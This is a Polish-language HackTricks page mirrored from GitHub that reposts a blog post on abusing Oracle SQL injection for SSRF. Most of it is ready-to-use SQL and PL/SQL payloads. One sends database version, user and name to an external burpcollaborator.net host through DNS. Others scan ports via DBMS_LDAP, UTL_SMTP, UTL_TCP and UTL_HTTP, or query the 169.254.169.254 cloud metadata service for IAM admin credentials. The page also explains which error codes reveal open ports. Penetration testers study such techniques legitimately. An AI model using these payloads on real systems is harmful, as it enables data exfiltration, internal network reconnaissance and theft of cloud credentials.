mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-26 11:55:06 +00:00
172 lines
10 KiB
Markdown
172 lines
10 KiB
Markdown
|
# Oracle injection
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
**Zaserwuj ten post jako kopię z wayback machine usuniętego posta z [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/)**.
|
||
|
|
||
|
## SSRF
|
||
|
|
||
|
Używanie Oracle do wykonywania żądań HTTP i DNS Out of Band jest dobrze udokumentowane, ale jako sposób na eksfiltrację danych SQL w iniekcjach. Zawsze możemy modyfikować te techniki/funkcje, aby wykonać inne SSRF/XSPA.
|
||
|
|
||
|
Instalacja Oracle może być naprawdę bolesna, szczególnie jeśli chcesz szybko skonfigurować instancję, aby wypróbować polecenia. Mój przyjaciel i kolega z [Appsecco](https://appsecco.com), [Abhisek Datta](https://github.com/abhisek), wskazał mi [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c), co pozwoliło mi skonfigurować instancję na maszynie t2.large AWS Ubuntu i Docker.
|
||
|
|
||
|
Uruchomiłem polecenie docker z flagą `--network="host"`, aby móc naśladować Oracle jako natywną instalację z pełnym dostępem do sieci, przez cały czas trwania tego wpisu na blogu.
|
||
|
```
|
||
|
docker run -d --network="host" quay.io/maksymbilenko/oracle-12c
|
||
|
```
|
||
|
#### Pakiety Oracle, które wspierają specyfikację URL lub nazwy hosta/numeru portu <a href="#oracle-packages-that-support-a-url-or-a-hostname-port-number-specification" id="oracle-packages-that-support-a-url-or-a-hostname-port-number-specification"></a>
|
||
|
|
||
|
Aby znaleźć jakiekolwiek pakiety i funkcje, które wspierają specyfikację hosta i portu, przeprowadziłem wyszukiwanie w Google na [Dokumentacji Online Oracle Database](https://docs.oracle.com/database/121/index.html). Konkretne,
|
||
|
```
|
||
|
site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"
|
||
|
```
|
||
|
Wynik wyszukiwania zwrócił następujące rezultaty (nie wszystkie mogą być użyte do wykonywania wychodzącej sieci)
|
||
|
|
||
|
* DBMS\_NETWORK\_ACL\_ADMIN
|
||
|
* UTL\_SMTP
|
||
|
* DBMS\_XDB
|
||
|
* DBMS\_SCHEDULER
|
||
|
* DBMS\_XDB\_CONFIG
|
||
|
* DBMS\_AQ
|
||
|
* UTL\_MAIL
|
||
|
* DBMS\_AQELM
|
||
|
* DBMS\_NETWORK\_ACL\_UTILITY
|
||
|
* DBMS\_MGD\_ID\_UTL
|
||
|
* UTL\_TCP
|
||
|
* DBMS\_MGWADM
|
||
|
* DBMS\_STREAMS\_ADM
|
||
|
* UTL\_HTTP
|
||
|
|
||
|
To proste wyszukiwanie oczywiście pomija pakiety takie jak `DBMS_LDAP` (który pozwala na podanie nazwy hosta i numeru portu), ponieważ [strona dokumentacji](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360) po prostu kieruje cię do [innej lokalizacji](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360). Dlatego mogą istnieć inne pakiety Oracle, które mogą być nadużywane do wykonywania wychodzących żądań, które mogłem przeoczyć.
|
||
|
|
||
|
W każdym razie, przyjrzyjmy się niektórym z pakietów, które odkryliśmy i wymieniliśmy powyżej.
|
||
|
|
||
|
**DBMS\_LDAP.INIT**
|
||
|
|
||
|
Pakiet `DBMS_LDAP` umożliwia dostęp do danych z serwerów LDAP. Funkcja `init()` inicjalizuje sesję z serwerem LDAP i przyjmuje nazwę hosta oraz numer portu jako argument.
|
||
|
|
||
|
Funkcja ta była wcześniej dokumentowana, aby pokazać eksfiltrację danych przez DNS, jak poniżej
|
||
|
```
|
||
|
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
|
||
|
```
|
||
|
Jednakże, biorąc pod uwagę, że funkcja akceptuje nazwę hosta i numer portu jako argumenty, możesz to wykorzystać, aby działało jak skaner portów.
|
||
|
|
||
|
Oto kilka przykładów
|
||
|
```
|
||
|
SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
|
||
|
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
|
||
|
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
|
||
|
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
|
||
|
```
|
||
|
A `ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.` wskazuje, że port jest zamknięty, podczas gdy wartość sesji wskazuje, że port jest otwarty.
|
||
|
|
||
|
**UTL\_SMTP**
|
||
|
|
||
|
Pakiet `UTL_SMTP` jest zaprojektowany do wysyłania e-maili przez SMTP. Przykład podany na [stronie dokumentacji Oracle pokazuje, jak można użyć tego pakietu do wysłania e-maila](https://docs.oracle.com/database/121/ARPLS/u\_smtp.htm#ARPLS71478). Dla nas jednak interesującą rzeczą jest możliwość podania specyfikacji hosta i portu.
|
||
|
|
||
|
Poniżej przedstawiono prosty przykład z funkcją `UTL_SMTP.OPEN_CONNECTION`, z limitem czasu wynoszącym 2 sekundy.
|
||
|
```
|
||
|
DECLARE c utl_smtp.connection;
|
||
|
BEGIN
|
||
|
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
|
||
|
END;
|
||
|
```
|
||
|
|
||
|
```
|
||
|
DECLARE c utl_smtp.connection;
|
||
|
BEGIN
|
||
|
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
|
||
|
END;
|
||
|
```
|
||
|
A `ORA-29276: transfer timeout` wskazuje, że port jest otwarty, ale nie nawiązano połączenia SMTP, podczas gdy `ORA-29278: SMTP transient error: 421 Service not available` wskazuje, że port jest zamknięty.
|
||
|
|
||
|
**UTL\_TCP**
|
||
|
|
||
|
Pakiet `UTL_TCP` oraz jego procedury i funkcje umożliwiają [komunikację opartą na TCP/IP z usługami](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190). Jeśli jest zaprogramowany dla konkretnej usługi, ten pakiet może łatwo stać się sposobem na dostęp do sieci lub wykonywać pełne żądania po stronie serwera, ponieważ wszystkie aspekty połączenia TCP/IP mogą być kontrolowane.
|
||
|
|
||
|
Przykład [na stronie dokumentacji Oracle pokazuje, jak można użyć tego pakietu do nawiązania surowego połączenia TCP w celu pobrania strony internetowej](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190). Możemy to nieco uprościć i użyć go do wysyłania żądań do instancji metadanych na przykład lub do dowolnej usługi TCP/IP.
|
||
|
```
|
||
|
set serveroutput on size 30000;
|
||
|
SET SERVEROUTPUT ON
|
||
|
DECLARE c utl_tcp.connection;
|
||
|
retval pls_integer;
|
||
|
BEGIN
|
||
|
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
|
||
|
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
|
||
|
retval := utl_tcp.write_line(c);
|
||
|
BEGIN
|
||
|
LOOP
|
||
|
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
|
||
|
END LOOP;
|
||
|
EXCEPTION
|
||
|
WHEN utl_tcp.end_of_input THEN
|
||
|
NULL;
|
||
|
END;
|
||
|
utl_tcp.close_connection(c);
|
||
|
END;
|
||
|
/
|
||
|
```
|
||
|
|
||
|
```
|
||
|
DECLARE c utl_tcp.connection;
|
||
|
retval pls_integer;
|
||
|
BEGIN
|
||
|
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
|
||
|
retval := utl_tcp.write_line(c);
|
||
|
BEGIN
|
||
|
LOOP
|
||
|
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
|
||
|
END LOOP;
|
||
|
EXCEPTION
|
||
|
WHEN utl_tcp.end_of_input THEN
|
||
|
NULL;
|
||
|
END;
|
||
|
utl_tcp.close_connection(c);
|
||
|
END;
|
||
|
```
|
||
|
Ciekawie, z powodu możliwości tworzenia surowych żądań TCP, ten pakiet może być również używany do zapytań do usługi metadanych instancji wszystkich dostawców chmury, ponieważ typ metody i dodatkowe nagłówki mogą być przekazywane w żądaniu TCP.
|
||
|
|
||
|
**UTL\_HTTP i żądania sieciowe**
|
||
|
|
||
|
Być może najczęściej stosowaną i szeroko udokumentowaną techniką w każdym poradniku na temat Out of Band Oracle SQL Injection jest pakiet [`UTL_HTTP`](https://docs.oracle.com/database/121/ARPLS/u_http.htm#ARPLS070). Pakiet ten jest zdefiniowany w dokumentacji jako - `Pakiet UTL_HTTP wykonuje wywołania protokołu Hypertext Transfer Protocol (HTTP) z SQL i PL/SQL. Możesz go użyć do uzyskania dostępu do danych w Internecie za pośrednictwem HTTP.`
|
||
|
```
|
||
|
select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
|
||
|
```
|
||
|
Możesz dodatkowo użyć tego do przeprowadzenia podstawowego skanowania portów za pomocą zapytań takich jak
|
||
|
```
|
||
|
select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
|
||
|
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
|
||
|
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
|
||
|
```
|
||
|
`ORA-12541: TNS:no listener` lub `TNS:operation timed out` to znak, że port TCP jest zamknięty, podczas gdy `ORA-29263: HTTP protocol error` lub dane to znak, że port jest otwarty.
|
||
|
|
||
|
Innym pakietem, którego używałem w przeszłości z różnym powodzeniem, jest [`GETCLOB()` metoda typu abstrakcyjnego `HTTPURITYPE` Oracle](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705), która pozwala na interakcję z URL i zapewnia wsparcie dla protokołu HTTP. Metoda `GETCLOB()` jest używana do pobierania odpowiedzi GET z URL jako [typ danych CLOB.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Wsparcie dla HackTricks</summary>
|
||
|
|
||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Dziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|